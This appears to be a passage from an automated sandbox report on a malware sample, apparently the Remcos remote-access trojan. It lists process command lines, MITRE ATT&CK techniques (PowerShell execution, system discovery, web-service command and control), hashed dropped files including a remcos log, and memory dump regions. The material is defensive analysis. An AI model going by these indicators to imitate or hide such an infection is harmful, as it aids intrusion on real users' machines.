        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd79846f8,0x7fffd7984708,0x7fffd7984718
        7⤵
        
        PID:6340

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4952

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
218B

MD5
b8ecc886650bf7ec07fffcb93c2a68ea

SHA1
7fc3d11d243b5584a434eb461d1ea24e2e09af44

SHA256
33343bf3ff6afbaea25a0e65e5999b2dc605e1cfc815170805d7ac91adb24942

SHA512
cb117a7f83e46ddd1005a5c70517ce73338dd73019261c597d9ab91cd02e23e7acbf07de606f47227579d6a1fff44e03b4623e4f0a6fd6dd4d60c564f7b198c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7de1bbdc1f9cf1a58ae1de4951ce8cb9

SHA1
010da169e15457c25bd80ef02d76a940c1210301

SHA256
6e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e

SHA512
e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
85ba073d7015b6ce7da19235a275f6da

SHA1
a23c8c2125e45a0788bac14423ae1f3eab92cf00

SHA256
5ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617

SHA512
eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

Filesize
45KB

MD5
06ee4431ae23e898d65e5dd312f78dd9

SHA1
4e3a89bcbe65d9cf9b4250f24cc9890b7ee30538

SHA256
9f13fc2e60ed069062f7a57de3ec658caaf399e52b8bc8983bd506d62f82be11

SHA512
22f304c2e866ccabcdd02cc00e786da90c64a0d6f497bef919a0b4b1bc4c3830b5fa99c34efe5381dda5903066f1e0b935fa8c6a953d42975c9ec9c241161851

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
67KB

MD5
4926b457580a037ed5d272dbf87776f9

SHA1
4ef2158087d0d3eea2aac98682e21aa1ce589123

SHA256
118ae6ff442b3aacfb3de8f961704b85cb0a70e1bb66e617e5bfa92e4e24499e

SHA512
4468d5db6937c7abb2491babb5e11fa9931920be287805495060192f3c253d412ab39621f70cd44a9d33c6bef72c9b44c3384d9625d1aa10868e3ec5955613f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
470KB

MD5
cb42ca61bf10114211da1a6201bbf03a

SHA1
d749c3f58cd3250c9b84c1d73c58fc1a6cf0c8e6

SHA256
89fda04ab48db2db11ac25c78f4fd3436f59d0e003e5a0587ebc900ef95d8898

SHA512
0c7bcdb53cf15269f7f5dc8a2d5ca88adf4cc4889d73e66d16d26f4cd8721bad1c4cc008a8514c4e5462815454de4ee21490e992dad115829b72c363343b067e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
89KB

MD5
6c66566329b8f1f2a69392a74e726d4c

SHA1
7609ceb7d28c601a8d7279c8b5921742a64d28ce

SHA256
f512f4fb0d4855fc4aa78e26516e9ec1cfabc423a353cd01bc68ee6098dc56d6

SHA512
aca511bfaf9b464aff7b14998f06a7e997e22fcbe7728401a1e4bd7e4eceb8c938bbd820a16d471d0b5a0589d8807b426b97292fc2a28578a62e4681185556c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
34KB

MD5
522037f008e03c9448ae0aaaf09e93cb

SHA1
8a32997eab79246beed5a37db0c92fbfb006bef2

SHA256
983c35607c4fb0b529ca732be42115d3fcaac947cee9c9632f7cacdbdecaf5a7

SHA512
643ec613b2e7bdbb2f61e1799c189b0e3392ea5ae10845eb0b1f1542a03569e886f4b54d5b38af10e78db49c71357108c94589474b181f6a4573b86cf2d6f0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
17KB

MD5
240c4cc15d9fd65405bb642ab81be615

SHA1
5a66783fe5dd932082f40811ae0769526874bfd3

SHA256
030272ce6ba1beca700ec83fded9dbdc89296fbde0633a7f5943ef5831876c07

SHA512
267fe31bc25944dd7b6071c2c2c271ccc188ae1f6a0d7e587dcf9198b81598da6b058d1b413f228df0cb37c8304329e808089388359651e81b5f3dec566d0ee0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
79KB

MD5
e51f388b62281af5b4a9193cce419941

SHA1
364f3d737462b7fd063107fe2c580fdb9781a45a

SHA256
348404a68791474349e35bd7d1980abcbf06db85132286e45ad4f204d10b5f2c

SHA512
1755816c26d013d7b610bab515200b0f1f2bd2be0c4a8a099c3f8aff2d898882fd3bcf1163d0378916f4c5c24222df5dd7b18df0c8e5bf2a0ebef891215f148e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
18KB

MD5
74f49bcdbd13777670657d78944e97f8

SHA1
862256addfc55950fa4b4da43e5619c24722bd31

SHA256
1f4aa7693f801ea02e189c3b85101e1a5c24ffd6c335d54d1b212f9981ea3f05

SHA512
c699383350446f3f665418edaf74e4e235532963801ce3c9fd57f49526aeb9b8fb6cb28fd9bb0a3e65a0521029b4d1821eade0e8a5d56eeafdca244650dd9f8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
32KB

MD5
64d3be46eb793f6fe19bee805638cb80

SHA1
93bd75cf654214f8a76af8e1290499147d971c5c

SHA256
74c048fd2c6c9516438db1f627419a783622abcdc0522a5c4a1a568317a3d13c

SHA512
4646ac163dcc465669a868003b2667752eef8cad1f40dbff48c7f5d4c5f2120637f2514a0202f2008d52edfb377d1341d1b0411e556011ce9e2de194ee405908

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

Filesize
259KB

MD5
9304479f25d8f8af6bda260a6f8bda4e

SHA1
54828173c5933b5dc8cc464d635ff59501b0d667

SHA256
7ba3de2a2dec667cee6c3c5b88d10c7c58e5e658545beec7a4e0f7191d18d3a9

SHA512
57d06cc8116647136298a3f0588ddfe6533dc617497efca471317f19a0cced0975b146ad7837ed84669cdd3549565611c7068f8c48a1e803bdd32350172f65a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\279d3b379b6f0e3e_0

Filesize
295KB

MD5
7021624b7d220ab45baee7f3eabca61e

SHA1
0d5d1e3404fa33fe2ca61a97b5a42fadff66d57a

SHA256
25c127809d9edeb380d590e43ff1443a0ada5fa586e085c0c2f716f4b82ce838

SHA512
a0a26ac32469afb5803da38c12ee35f3992aa493e28991940ba4761cb958d3c92ba5ac6a0cc9091f13efdd763295694affb348217cd323ed30aae87999eb4b65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3ab592dde6ff023e_0

Filesize
272B

MD5
89c4132dba4d67e6bf64e2e1afa4326c

SHA1
e039b5fb4da3e32ee13d2a338912b602ef8fb995

SHA256
ab52cc6b3512e767d2a21e05503f7c38b89775b111d1c21ca50c9a90fb242aa1

SHA512
0293602683fd5b878cc79d2b47a2ea771a9c9c46d56b54557234c85df54320b9ceef4f2675e93d217ded857012978a52bde93338e002f6ac1dc70eedbfeca810

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5aee6296f8d5b3f1_0

Filesize
188KB

MD5
0b5cebefc0e57ae6a03eb9305552812e

SHA1
bd70e47fa257d1fbe31a8e81d8c371934f16964f

SHA256
1610f61209e3d97e79c006e3e1e6c240a607c34336747ea3cce3b737a68032a0

SHA512
0edfda02c3c9cbc7ac80038b100858c3f063e2281af684d185d931070898b38fdb7787fbd73435efbf5eee9d7bc9c91d83732170527e53e2a2f0175e5117d807

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\67c896e8aae559d2_0

Filesize
291B

MD5
9bf06442356971da68eb68bf722c208b

SHA1
96e63086755d6637e1a2aa6dbe0a5b762c679073

SHA256
dd8d3c75bfb7158dbd59f59c60a6b11d8e3c33b7e2a63d3f9400753897de01fe

SHA512
3aa2e524350d22822530ee1eb7f9d6e63bfaee2193cbbf18a62e86282393a82c86e6bf03faa2894be7e27cf15650e4232741ec718b19dbb4595aae860822de86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8a8ceb05c1be3908_0

Filesize
1.3MB

MD5
ba14958f61b82f2fa725e50638e266f8

SHA1
a3f8bc6d9b11c306693e72135bf44f8a1f3da41f

SHA256
4161c97a3b34e388d9e3fab63896dd27c6985f3e632761c0d89fc2a4883b3a45

SHA512
7c20ab60f1f742c4692f975ae35e4ec0a3cdf4c5c5ccd1eecdf4675076d517c2900b1efc8cad0484576522e91a50a1f4c5afa9d065603ef0f80a692cc5d1032a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\9d0f42c8a99f9b25_0

Filesize
1.1MB

MD5
b7d17511dcb2b8f569c6e454443590cc

SHA1
3e542f6d3bf56fae91b17f53072c1b98c0522e34

SHA256
f1af0f0ed09d9447c1b3b09cae39b992958d7113ba86fa3c5a8e98b2f929de07

SHA512
9054f23cc77ada5fd993eca0d04ad111b2ca89df1972bd740424a28df719bb8556741d249953712aa122b0373f7710cf11e9010f2edae7f3939128f074639db4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\dcaf5f5d8b2044c6_0

Filesize
297B

MD5
a9358b989db872dfba26202aaa7bf321

SHA1
94c9e784fe57f83c05d5f6acd428d0c3d603c112

SHA256
5068056393d0a7bde6123c21a12a4d113ae2d61643f0c1fe48f2bad8f6681cbb

SHA512
f439c9087ca05b96449201eace8417fbcda3425490b0c53c25eae2a2b639e2b723426a911d36d024c8405b0840422f8d43c08b0ffa29b0bfc3fdb45cef815939

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ec1453286dabb20a_0

Filesize
1KB

MD5
f41697aee1ed9c89b1219f520402f6e7

SHA1
89a580bf15114db223735e5c3a96a0b39a80d14c

SHA256
76cbfdd2e98bd4b4e3b2c372470d13d3c1de98153f98f7fe56ee4bc7ac9d7062

SHA512
3a787f216e91d8226209ff42090dd9e920c9fbda88ab7ed997439b0639692f10b04ce082a5b8289d26ad8b6936b8f4b18b961743e3bc25bafdf9c64ba1534ef5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f29ed5b5251e1eaf_0

Filesize
269B

MD5
ec9f3b0f5fc76eeb7de9f792016c28b0

SHA1
177b87a1649668d7d93d94dd7f52fb9844bd45ef

SHA256
195e61bc7903c2727dd318ba8c9997ba21d87b4192e67c127948159fb0a7f288

SHA512
a11030cc325217492a705a5b7fbc59baeb4116b18bd01056214dec195b8e76fc24e6957263c47bd76eeaa493a0a6469f0c5e77aaa534cbc3b388e214fa00b0b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
437B

MD5
05592d6b429a6209d372dba7629ce97c

SHA1
b4d45e956e3ec9651d4e1e045b887c7ccbdde326

SHA256
3aacb982b8861c38a392829ee3156d05dfdd46b0ecb46154f0ea9374557bc0fd

SHA512
caa85bdccabea9250e8a5291f987b8d54362a7b3eec861c56f79cebb06277aa35d411e657ec632079f46affd4d6730e82115e7b317fbda55dacc16378528abaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
87f91d8c95b3367e5d53f5952455e042

SHA1
c335aa377f5faa4346e85bfd82fe0d4a974e0a83

SHA256
a2b10307b624880f1e6b9cd67b4f60b2218bf9e7f7d3ca970a434281190d4c41

SHA512
5f45ffc4c8e99663aa5a36f7f2e7162ca567a778172e0248d6d6d2c85be9e6e1730aca3744c00fe12b83bbe63f7ff9cc2c00bc449447e5fdb262008181bba0e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
84a7776be9d85023ad178c95407e703e

SHA1
e443e37530c9b888dc41c5dd51543e71d69b2436

SHA256
7100f1a4b0fadc35a29c0257845ee8c204ee8ea1fa01d671817b4d68cafdcc0b

SHA512
19019c2f9a5e7b1f6834abfae2aa0ca9b067363b8a21582e49ecd7d1de30e1a89da58169aa92b24eba37bd75d1586b5ef1f8f21c88fe67f609b7991b61d0352d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
1dfc9b3563c59433f3f10cd23daf6185

SHA1
61d585ccd7390d89aed3839a3c330e57ccef0bc5

SHA256
0affead5d51f015d3228b1febcfd9feb76d61a672c5f236ba55887b3102d86b9

SHA512
a05ad16f45718f039e4a583be962205fe5796f53d2f0ee1bd8029344e780da76d0aac196ca8187be7f69d76e7b086a3953c39c0413f709ebff625154b19356f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
9cce0a5184c4502dd4f05bde42182a9e

SHA1
b2b26a5449d6d5c7d8a08e006a5af5fc65129c10

SHA256
0ea62dfeca2ff3c353503fa87a7f971feeb3166e8b5df0f21cf7ab7ac1b36849

SHA512
37be59d4e613fdde393c7c317a4b9014ce4307bcb8843e37b510177d268da2bf4836dd4dd0a270df1956c734970e3b5c11c8744b49d90c9a0cd32aeb26bba6b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
140572b984662e7d97e1bd3b02ac54f1

SHA1
87a7b3ba562641a9e01adaff694d36e03c599039

SHA256
7af6adfef5563551b1b6f11c8c574b382ded955ec41cfbe864291fbf18aaff91

SHA512
aac2a59aeee13dad23b5704a4cbe413cef6e4813d206674238150f614e9fe0aacba52f47990e31216c1db79364a92deafd7ac6457a48fc86ee77d48221938c50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
b1ba18bb81009bb570fc5693bf49f220

SHA1
e1e15a731af7032445523966acfb091d5876e7e6

SHA256
deebe17c75794e68191949c5eaf68ad1e6be36cb17cbf0efed55e37a30fee939

SHA512
9279b81f3949dc4f935bfeaadb7ed60e7498f033acd3573a426094e5789a4121957561c2408f206de478de3ae327199d02dd4ff8191a562c71443d3a0c6bc722

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
76f36d49449c3154918d5a33d21c337f

SHA1
e66aec7c29357ded115bb18f54788e1052719b7a

SHA256
6ce6b2182fb6b6fba5eece9b24a2731d0adbd9861a336a119e7637e06c964caa

SHA512
d8e89e9f6ca2037af59bdf967c131c66517f0af42379238af2f0b6d0e4c0758e1baf5b7583f9a09b4235372793c70966fea644cdcb087171f063337d2fd6015f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
c2b361ffc6ad6c502d79a68f342d8629

SHA1
b687b8868cc05a3bbf8420652dd0cb57c4e37420

SHA256
119a455822bc5c2fb25b6af13d763fd3aaa0a4280e6dc2a02bffb119482468f0

SHA512
da784f85e7ac16fb9009996206ce6ec0df9d63cf9a757cf2454e5ad3303d156c5c04aab20060a6ca3bd3b9fd41e4416560d977d3649004506850fc2e8f9ff8ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
89423636e024a69ad4f29b0efce95dc2

SHA1
0e4b6142b10f6b56ee118f285a3ddd6e5bca44e8

SHA256
0956dae54d76bdb1605e04daecddfd58cd9f7c2935eba4fa49c426f047f20bf7

SHA512
7ad064570bf546efdfd1070174c08de983e5eadfb011a924ecef3a094eefe75242cf96459674bd56ddfbbbb9c1fad6435d6603a4f1b85dfd5b9245d0fbd9c3ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
2d42746a12f7779e4e666c335500a90e

SHA1
649907e9a0043b21c9fc3482556847601706fa9b

SHA256
bdd1fe221125dfa29d152fb88ae4d7a8cdca6b7c9dee9a2cad5691494fe2ee41

SHA512
a284fc8ca9a726667a355fa772035bb34f1432bf37133f867f531560d10c82a784130af616831606e5007729d3670830d85f9f1368a8939ce817d8b51d9acb92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
9414118537bfd4e5029f615f4c17b7bb

SHA1
8c4ea7d14ca65a2a718958368b4ec730e21e8894

SHA256
d71092f1aeb4c863a02bf68ea73dd805deb4f43dd78b3973d23e3ee207005ce7

SHA512
0de211c92f1d517621857ca33264fbad78f38b204616290f8b07cbc3db530eae65df7a416aa806c91ecf84c95f7ea63b86e53f1155ac75ed5fa51c88e9e4bf13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
367B

MD5
2b36aca08cd8a33ac5989eab9be00f1d

SHA1
ac3dc90c2036db6cde80a7d231ab8e03b8184517

SHA256
b9f235e3b6120329e110d0fc8fce2fc609884a04d751dc0f8742f56fe96ff9cd

SHA512
579d51136feae0ab2a496304b5bb2951081576a57931207486813c5c47c2b902016fb1f186bb71f06d5ce50b00278d0b125459611b43b1f54db374acd1c19136

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
367B

MD5
fdbb6d0fc6c98aa4b4b97e4609f6ce98

SHA1
61e08893a7151219caf5fbe3d444ae10c477e523

SHA256
c6e75f235db44c58c9eb597bdbc5c47ec8afbca9470c70b1e020ebf8f9542b77

SHA512
a779eaafadd9992ad5d9b0a53b1b0460bfd25b107e3f3494b0b07ab4c87f18df21979b59910197c98c45fbc7d0f2f4d115e296705d64f97ef18e2fe8d99f3ba8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
b798c8654d7f850450c999b3650b1556

SHA1
1d6b51ece31c3db24ee1e053a42e116b68ed7e3f

SHA256
145df5cd7a4133dca921761c255a92f95ff6cfb03a88c829ca41fcc7139f4c5b

SHA512
faa862e2f8256085d0eb2b0966728d410cb2dbdfabca227cf6511912e1ab7abf668fc2191507fed79647be90e7615fa76451e7a2bd3a41c87e6bc948b308459e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
9f60969f82bb2fe713284a3a77c31b17

SHA1
b02f4327bf635e44ac6118d912df18ccd0ee8656

SHA256
e5291e71c490f77c31ce92442eef1cc1dbdb78d6dda20ffa1a7e799c57f420ab

SHA512
9e6140383bb030a0321633e8c947062bc77bd25ee3c5b1b15fd1b80d2bd6aa32435170182c876f64cf70d0893696aaf5bd06af97b9ec2336855e2660b20ac6db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
369B

MD5
a96534d54a67a73b5aefb3e322da8162

SHA1
d428a4d81e56cee75d2879e188e368c91fe170a8

SHA256
4290059b17f167b75744cdc0d7b3ad0c82a540666903df391563aa16455856e8

SHA512
ac420d4eeb4939185169df3512e836d3b4c7fbd6537df794bc57430b212f7ba3d47b7535e83ddb0ea60b4ac6adbb85367f7dce60af519e516789616e0e87b7d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe586afa.TMP

Filesize
203B

MD5
1ad42a806467da8ee831a14365c6e779

SHA1
270f80c63e95c2525c86932b45d1daf572272b88

SHA256
81f587d0792aaef7067e61913c381edd16804f99e48cab52f0077d8f3e407ae3

SHA512
43d4480d9502e382bc1ef2af46043ca95b672e299aa8c5895a7993d42f3df0b938129af6ad3dd5320b9b8a4e8b398fc000f3175a97c74f9d904ee7791508f744

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
22e32dcc709f0bfcb1f6d864f66a96bb

SHA1
ecf08719dbf25ad9042991a871729c646931b707

SHA256
0076f7aabc6a9f63732c274ee727142c91af8d4c63e7fda733336cef10b88e00

SHA512
6a5034b5991605781df7589a787dabdd8032edddbe6fdbe15efe4ee4271a683e1b317c227b8d14351ed31277500232cc3c8545130c35aa5ce259d8990da9c6e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
67c2cd9b24bf2c01112cdc65fb66dda5

SHA1
06962040d99db223835235bf178627bf7a208ab8

SHA256
080e1289ccbc71018510451c2bff7677c9fc4e7147f55bea91a49df061628bc9

SHA512
ea3d1aab6713722ac5d8954ed06059f5b4697fb16887010edcad2acb84fc42e14700b2eff5d1e5a084c4b2154144384e664d490057db4d716f2de47d17560651

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_brjtfqvi.0jx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/536-602-0x0000000000E20000-0x0000000000E2C000-memory.dmp

Filesize
48KB

Download
memory/2504-704-0x0000000000F00000-0x0000000000F0C000-memory.dmp

Filesize
48KB

Download
memory/3112-472-0x0000000000FB0000-0x0000000000FBC000-memory.dmp

Filesize
48KB

Download
memory/4016-50-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-468-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-741-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-41-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-739-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-44-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-600-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-207-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-47-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-39-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-469-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-349-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-846-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-330-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-847-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-181-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4016-599-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4072-1-0x00007FFFD5EB3000-0x00007FFFD5EB5000-memory.dmp

Filesize
8KB

Download
memory/4072-2-0x0000023747AC0000-0x0000023747AE2000-memory.dmp

Filesize
136KB

Download
memory/4072-12-0x00007FFFD5EB0000-0x00007FFFD6971000-memory.dmp

Filesize
10.8MB

Download
memory/4072-13-0x00007FFFD5EB0000-0x00007FFFD6971000-memory.dmp

Filesize
10.8MB

Download
memory/4072-14-0x00007FFFD5EB0000-0x00007FFFD6971000-memory.dmp

Filesize
10.8MB

Download
memory/4072-17-0x00007FFFD5EB0000-0x00007FFFD6971000-memory.dmp

Filesize
10.8MB

Download
memory/4116-49-0x0000000000120000-0x000000000012C000-memory.dmp

Filesize
48KB

Download
memory/4484-38-0x0000024CF35B0000-0x0000024CF39F8000-memory.dmp

Filesize
4.3MB

Download
memory/4568-130-0x0000000000110000-0x000000000011C000-memory.dmp

Filesize
48KB

Download
memory/5284-249-0x00000000008C0000-0x00000000008CC000-memory.dmp

Filesize
48KB

Download
memory/5308-362-0x00000000007F0000-0x00000000007FC000-memory.dmp

Filesize
48KB

Download
memory/6896-810-0x0000000000FD0000-0x0000000000FDC000-memory.dmp

Filesize
48KB

Download